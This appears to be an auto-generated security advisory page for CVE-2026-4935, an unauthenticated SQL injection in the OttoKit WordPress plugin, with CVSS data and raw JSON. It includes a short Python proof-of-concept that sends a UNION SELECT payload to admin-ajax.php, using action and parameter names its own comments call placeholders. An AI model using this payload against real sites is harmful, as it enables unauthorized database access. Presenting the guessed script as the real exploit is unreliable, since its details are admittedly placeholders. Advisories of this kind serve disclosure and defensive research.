Security Vulnerability Report
中文
CVE-2026-4935 CVSS 8.6 HIGH

CVE-2026-4935

Published: 2026-05-08 07:16:29
Last Modified: 2026-05-08 15:47:53

Description

The OttoKit: All-in-One Automation Platform WordPress plugin before 1.1.23 does not properly sanitize user input before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

OttoKit < 1.1.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_sqli(url): # Target endpoint might be admin-ajax.php or a specific plugin page target = f"{url}/wp-admin/admin-ajax.php" # Payload attempting to extract database version # Note: The specific parameter name depends on the vulnerable code payload = { "action": "ottokit_action", # Placeholder action "param": "1' UNION SELECT 1, 2, version(), 4-- -" } try: response = requests.post(target, data=payload, timeout=10) if response.status_code == 200: print("Request sent. Check response for database version.") print(response.text[:200]) except Exception as e: print(f"Error: {e}") # Usage # check_sqli("http://example-site.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4935", "sourceIdentifier": "[email protected]", "published": "2026-05-08T07:16:29.327", "lastModified": "2026-05-08T15:47:53.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The OttoKit: All-in-One Automation Platform WordPress plugin before 1.1.23 does not properly sanitize user input before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://wpscan.com/vulnerability/54bc1bf4-1033-49e2-aff9-a14c834c35bd/", "source": "[email protected]"}]}}